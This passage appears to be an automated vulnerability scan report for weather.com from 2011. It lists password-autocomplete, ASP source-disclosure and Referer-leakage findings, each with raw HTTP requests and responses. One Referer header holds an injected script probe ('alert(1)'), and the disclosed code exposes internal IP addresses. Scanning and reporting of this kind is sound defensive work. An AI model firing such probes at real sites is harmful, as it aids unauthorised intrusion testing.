User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:32:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web1x10
VarnishSet: web
X-Varnish: 1455522174
Vary: Accept-Encoding
Content-Length: 96659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<HTML>
<HEAD>
<TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...
2.2. http://www.weather.com/services/desktop.html  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weather.com
Path:   /services/desktop.html

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /services/desktop.html HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x10
Expires: Thu, 24 Mar 2011 17:36:38 GMT
Connection: keep-alive
Content-Length: 96326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free Desktop Weather and Alerts from The Weather Channel</title>


<meta name="descr
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...
2.3. http://www.weather.com/weather/health/beauty/  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.weather.com
Path:   /weather/health/beauty/

Issue detail

The page contains a form with the following action URL:The form contains the following password field with autocomplete enabled:

Request

GET /weather/health/beauty/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/activities/driving/rushhour/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=3; RMID=c245359a4d8b7f55; rsi_segs=K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A3%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Factivities%2Fdriving%2Frushhour%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A3%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988001253%7D; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300988045611%7C1303580045611%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/activities/driving/rushhour/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Pragma: no-cache
Content-Language: en-US
Content-Type: text/html;charset=ISO-8859-1
Server: Apache
Vary: Accept-Encoding
SVRNAME: web2x11
Date: Thu, 24 Mar 2011 17:33:32 GMT
Connection: keep-alive
Content-Length: 116103


       <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang="en">


   <head>
       <meta http-equiv="co
...[SNIP]...
<ul class="twc-tier-2">
   <form class="twc-sign-in" action="https://registration.weather.com/ursa/login" method="post">
       <label for="twc-header-uid">
...[SNIP]...
</label>
       <input class="twc-password twc-text-box" id="twc-header-pwd" type="password" name="password" value="" title="">
       <input class="twc-sign-in-button" title="Sign In" type="submit" value="Sign In">
...[SNIP]...
3. Source code disclosure  previous  next
There are 3 instances of this issue:

3.1. http://www.weather.com/activities/driving/rushhour/  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.weather.com
Path:   /activities/driving/rushhour/

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /activities/driving/rushhour/ HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=2; RMID=c245359a4d8b7f55; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A2%2C%22to%22%3A4.4%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A2%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300987770411%7D; rsi_segs=D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CUndeclared%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fromStr=nav_secondary; s_pers=%20s_nr%3D1300987999757%7C1303579999757%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dhomepage%2525253A/index.html%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/activities/driving/rushhour/%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:32:46 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web1x10
VarnishSet: web
X-Varnish: 1455522174
Vary: Accept-Encoding
Content-Length: 96659

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">


<HTML>
<HEAD>
<TITLE>Traffic reports for rush hour traffic conditions and delays from weather.com<
...[SNIP]...
<script type="text/javascript">
var OAS_query = '';
var gnSiteMode='';
   // Global Cache busting section
           // Global Cache busting section
   //
   // <% /**
       var remoteAddr="172.16.24.21";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       var bust_globalNav='/v.20100727.0';
       var bust_headerNavYUITypeAhead='/v.20100727.0';
       var bust_recentSearch='/v.20100621.1';
       var bust_s_code='/v.20110111.2';
       var bust_typeAhead='/v.20100621.1';
       var bust_swfObject='/v.20100621.1';
       var bust_flCheckFlookie='/v.20100621.1';
       var bust_eventBroadcaster='/v.20100727.0';
   // **/ %>

    var css='style_sheet.css';if(typeof(pageType)!="undefined"&&(pageType=="920" || pageType=="980")){css="global.css";}
    if(typeof(pagetype)!="undefined"&&(pagetype=="980")){css="global.css";}
   if(ty
...[SNIP]...
3.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.weather.com
Path:   /mobile/swap/send_sms_to_phone.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x13
Expires: Thu, 24 Mar 2011 17:36:18 GMT
Connection: keep-alive
Content-Length: 34038

<HTML>
   <HEAD>
    <TITLE>Wireless Internet</title>
<script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap
...[SNIP]...
<script type="text/javascript">
var OAS_query = '';
var gnSiteMode='';
   // Global Cache busting section
           // Global Cache busting section
   //
   // <% /**
       var remoteAddr="172.16.24.21";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       var bust_globalNav='/v.20100727.0';
       var bust_headerNavYUITypeAhead='/v.20100727.0';
       var bust_recentSearch='/v.20100621.1';
       var bust_s_code='/v.20110111.2';
       var bust_typeAhead='/v.20100621.1';
       var bust_swfObject='/v.20100621.1';
       var bust_flCheckFlookie='/v.20100621.1';
       var bust_eventBroadcaster='/v.20100727.0';
   // **/ %>

    var css='style_sheet.css';if(typeof(pageType)!="undefined"&&(pageType=="920" || pageType=="980")){css="global.css";}
    if(typeof(pagetype)!="undefined"&&(pagetype=="980")){css="global.css";}
   if(ty
...[SNIP]...
3.3. http://www.weather.com/services/desktop.html  previous  next

Summary

Severity:   Low
Confidence:   Tentative
Host:   http://www.weather.com
Path:   /services/desktop.html

Issue detail

The application appears to disclose some server-side source code written in ASP.

Request

GET /services/desktop.html HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; fromStr=hdr_locations; s_pers=%20s_nr%3D1300988111198%7C1303580111198%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/services/desktop.html%252526ot%25253DA%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:25 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x10
Expires: Thu, 24 Mar 2011 17:36:38 GMT
Connection: keep-alive
Content-Length: 96326

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>Free Desktop Weather and Alerts from The Weather Channel</title>


<meta name="descr
...[SNIP]...
<script type="text/javascript">
var OAS_query = '';
var gnSiteMode='';
   // Global Cache busting section
           // Global Cache busting section
   //
   // <% /**
       var remoteAddr="172.16.24.23";
       
       var cssSpot = '/v.20101026.1';
       var extdivtoolsVAR = '/v.20101222.3';
       var triggerParamsstdLauncherVAR = '/v.20100929.6';
       var bust_hat='/v.20100727.0';
       var bust_hpCSS='/v.20100304.2';
       var bust_globalNav='/v.20100727.0';
       var bust_headerNavYUITypeAhead='/v.20100727.0';
       var bust_recentSearch='/v.20100621.1';
       var bust_s_code='/v.20110111.2';
       var bust_typeAhead='/v.20100621.1';
       var bust_swfObject='/v.20100621.1';
       var bust_flCheckFlookie='/v.20100621.1';
       var bust_eventBroadcaster='/v.20100727.0';
   // **/ %>

    var css='style_sheet.css';if(typeof(pageType)!="undefined"&&(pageType=="920" || pageType=="980")){css="global.css";}
    if(typeof(pagetype)!="undefined"&&(pagetype=="980")){css="global.css";}
   if(ty
...[SNIP]...
4. Cross-domain Referer leakage  previous  next
There are 6 instances of this issue:

4.1. http://www.weather.com/common/a21/makeRequest-2_3.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /common/a21/makeRequest-2_3.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /common/a21/makeRequest-2_3.html?pos=WX_Top300Variable&key=1300987733362 HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: fsr.a=1300987732569; fv=1; RMID=c245359a4d8b7f55

Response

HTTP/1.1 200 OK
Date: Thu, 24 Mar 2011 17:28:20 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Server: Apache
SVRNAME: web3x03
VarnishSet: web
X-Varnish: 2587929389
Vary: Accept-Encoding
Content-Length: 2503

<!DOCTYPE html>
<html lang="en">
<head>
<meta http-equiv="content-type" content="text/html;charset=UTF-8">
<title>Make a request</title>

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...
4.2. http://www.weather.com/mobile/swap/send_sms_to_phone.html  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /mobile/swap/send_sms_to_phone.html

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /mobile/swap/send_sms_to_phone.html?from=hdr_locations HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/weather/health/beauty/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; fromStr=; RMID=c245359a4d8b7f55; LocID=; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A4%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fweather%2Fhealth%2Fbeauty%2F%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A4%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988047405%7D; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Ddeepvert%2525253A/weather/health/beauty/%252526pidt%25253D1%252526oid%25253Dhttp%2525253A//www.weather.com/weather/health/beauty/%25252523%252526ot%25253DA%3B; s_pers=%20s_nr%3D1300988109827%7C1303580109827%3B

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Date: Thu, 24 Mar 2011 17:37:26 GMT
Pragma: no-cache
Content-Type: text/html; charset=iso-8859-1
Accept-Ranges: bytes
Server: Apache
Vary: Accept-Encoding
SVRNAME: web1x13
Expires: Thu, 24 Mar 2011 17:36:18 GMT
Connection: keep-alive
Content-Length: 34038

<HTML>
   <HEAD>
    <TITLE>Wireless Internet</title>
<script language="JavaScript">var ts_pageid="59201";var ts_pagename="/mobile/swap/send_sms_to_phone.html";var ts_level1="MOBILE";var ts_level2="swap
...[SNIP]...
<!-- DFP -->

<script type="text/javascript" src="http://s.imwx.com/v.20101222.3/js/legacy/ext-divtools.js"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://s.imwx.com/v.20110214.1/global/common/elements/javascript/a21-2_3.js"></script>
<script src="http://j.imwx.com/v.20110214.1/common/a21/plugins/a21plugins.js"></script>
...[SNIP]...
</script>

<script type="text/javascript" src="http://js.revsci.net/gateway/gw.js?csid=K06578" CHARSET="ISO-8859-1"></script>
...[SNIP]...
4.3. http://www.weather.com/pagelet/apps/traffic/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.weather.com
Path:   /pagelet/apps/traffic/

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

POST /pagelet/apps/traffic/?sub HTTP/1.1
Host: www.weather.com
Proxy-Connection: keep-alive
Referer: http://www.weather.com/pagelet8cd82%22-alert(1)-%22370523ec97/bc/56967?
Origin: http://www.weather.com
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi=[CS]v1|26C5BF9A851580E4-60000176C014BBD4[CE]; 22029_022811_exposed=exposrvy; QualtricsSDSiteVisit=1300987738656; fv=-1; LocID=; UserPreferences=3%7C%20%7C0%7Creal%7Cfast%7C-1%7C-1%7C-1%7C-1%7C-1%7C%20%7C%20%7C%20%7C%20%7C%20%7C-1%7CDriving%7C%20%7C%20%7C%20%7C%20%7Chp%7C4%7C%20%7C%20%7C%20%7C; RMID=c245359a4d8b7f55; rsi_segs=K06578_10038|K06578_10045|D08734_70117|D08734_70098|D08734_70105|D08734_71230|D08734_71432|K06578_10141|D08734_72009|K06578_10001; fsr.s=%7B%22v%22%3A1%2C%22rid%22%3A%221300987753825_646939%22%2C%22pv%22%3A5%2C%22to%22%3A5%2C%22c%22%3A%22http%3A%2F%2Fwww.weather.com%2Fservices%2Fdesktop.html%22%2C%22lc%22%3A%7B%22d0%22%3A%7B%22v%22%3A5%2C%22s%22%3Atrue%7D%7D%2C%22cd%22%3A0%2C%22sd%22%3A0%2C%22cp%22%3A%7B%22rmid%22%3A%22c245359a4d8b7f55%22%7D%2C%22f%22%3A1300988113570%7D; s_pers=%20s_nr%3D1300988122455%7C1303580122455%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3Dtwciwx%253D%252526pid%25253Dservices%2525253A/services/desktop.html%252526pidt%25253D1%252526oid%25253Dhttps%2525253A//registration.weather.com/ursa/login%252526ot%25253DA%3B; fsr.a=1300988430780
Content-Length: 0

Response

HTTP/1.1 400 Bad Request
Content-Type: text/html;charset=UTF-8
Expires: Thu, 24 Mar 2011 17:45:00 GMT
Server: Apache
Vary: Accept-Encoding
nnCoection: close
SVRNAME: wxii1x04
X-Varnish: 1510914846
Date: Thu, 24 Mar 2011 17:40:00 GMT
Connection: keep-alive
Content-Length: 108234

<!DOCTYPE HTML>


<html>
<head>
<title>Page Not Found</title>


<link href="http://s.imwx.com/v.20100615.171920/js/2.8.0r4/reset-fonts-base-autocomplete.css" type="text/css" rel="stylesheet">

<link href="http://s.imwx.com/v.20100719.135915/img/favicon.ico" rel="shortcut icon">
<link href="http://s.imwx.com/v.20100719.135915/img/favicon.ico" rel="icon">
<link rel="stylesheet" type="text/css" href="http://d.imwx.com/css/common-1-base,common-2-header,common-3-search,common-4-content,common-5-footer,common-6-alerts,common-7-panels,common-8-ads,common-9-yui.css">
<!--[if IE 6]>
...[SNIP]...
<![endif]-->
<link rel="stylesheet" type="text/css" href="http://d.imwx.com/css/module-1-base,module-2-seasonpromo,module-3-dl,module-4-ontv,module-5-onthisday,module-6-forecastlanding,module-7-laplinker,module-8-localalerts,module-9-iwitness.css">
<!--[if IE 6]>
...[SNIP]...
<![endif]-->

<link rel="stylesheet" type="text/css" href="http://d.imwx.com/css/weather-1-today,weather-2-media,weather-3-apps,weather-4-messaging.css" />
<style>
...[SNIP]...
</style>


<script type="text/javascript" src="http://s.imwx.com/v.20101122.141150/js/yuiloader-header-startup.js"></script>
...[SNIP]...
</script>


<script type="text/javascript" src="http://s.imwx.com/global/common/elements/javascript/a21-2_3.js"></script>


<script type="text/javascript" src="http://d.imwx.com/js/wx-a21-plugthis-2_0.js"></script>
...[SNIP]...
<div id="wx-page-inner">


                   <img src="http://b.imwx.com/b/page?type=top&pageID=60990" width="1" height="1" alt="" style="position:absolute;top:0px;left:0px;">


<script>
...[SNIP]...
